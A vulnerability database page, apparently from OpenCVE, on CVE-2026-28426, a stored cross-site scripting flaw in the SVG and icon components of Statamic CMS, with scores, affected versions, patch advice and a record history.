Description
Statmatic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, stored XSS vulnerability in svg and icon related components allow authenticated users with appropriate permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This has been fixed in 5.73.11 and 6.4.0.
Published: 2026-02-27
Score: 8.7 High
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting leading to privilege escalation
Action: Immediate Patch
AI Analysis

Impact

Prior to versions 5.73.11 and 6.4.0, Statamic CMS allowed authenticated users with certain permissions to embed malicious JavaScript into SVG and icon components via a stored XSS flaw. When a higher‑privileged user later viewed the affected content, the injected script executed in the context of that privileged user, enabling the attacker to compromise data, hijack sessions, or gain administrative rights. The flaw is classified under CWE‑79 and carries a CVSS 8.7 score, indicating high potential impact.

Affected Systems

The vulnerability affects the Statamic CMS product from vendor statamic:cms. All versions older than 5.73.11 for the 5.x series and older than 6.4.0 for the 6.x series are vulnerable.

Risk and Exploitability

The exploitation requires an authenticated user with permissions to modify SVG or icon components, making the attack vector web‑based and limited to users with edit rights. Although the EPSS score is below 1%, suggesting a low likelihood of exploitation in the wild, the high CVSS score and the fact that the flaw enables privilege escalation raise the overall risk. The vulnerability is not listed in the CISA KEV catalog, but remediation remains critical to prevent potential compromise of privileged accounts.

Generated by OpenCVE AI on April 16, 2026 at 15:06 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the patch to Statamic CMS 5.73.11 or 6.4.0 as released
  • Restrict access to SVG and icon upload functionalities to only trusted administrators if the patch cannot be applied immediately
  • Remove or sanitize any SVG or icon entries that contain untrusted content until a patch is applied

Generated by OpenCVE AI on April 16, 2026 at 15:06 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-5vrj-wf7v-5wr7 Statamic vulnerable to privilege escalation via stored cross-site scripting
History

Thu, 05 Mar 2026 14:45:00 +0000

Type Values Removed Values Added
First Time appeared Statamic statamic
CPEs cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*
Vendors & Products Statamic statamic

Mon, 02 Mar 2026 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Mon, 02 Mar 2026 12:15:00 +0000

Type Values Removed Values Added
First Time appeared Statamic
Statamic cms
Vendors & Products Statamic
Statamic cms

Fri, 27 Feb 2026 22:45:00 +0000

Type Values Removed Values Added
Description Statmatic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, stored XSS vulnerability in svg and icon related components allow authenticated users with appropriate permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This has been fixed in 5.73.11 and 6.4.0.
Title Statamic vulnerable to privilege escalation via stored cross-site scripting
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 8.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}

Subscriptions

Statamic Cms Statamic
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-02T19:39:23.113Z

Reserved: 2026-02-27T15:54:05.137Z

Link: CVE-2026-28426

cve-icon Vulnrichment

Updated: 2026-03-02T19:38:58.424Z

cve-icon NVD

Status : Analyzed

Published: 2026-02-27T23:16:05.780

Modified: 2026-03-05T14:32:00.283

Link: CVE-2026-28426

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-16T15:15:39Z

Weaknesses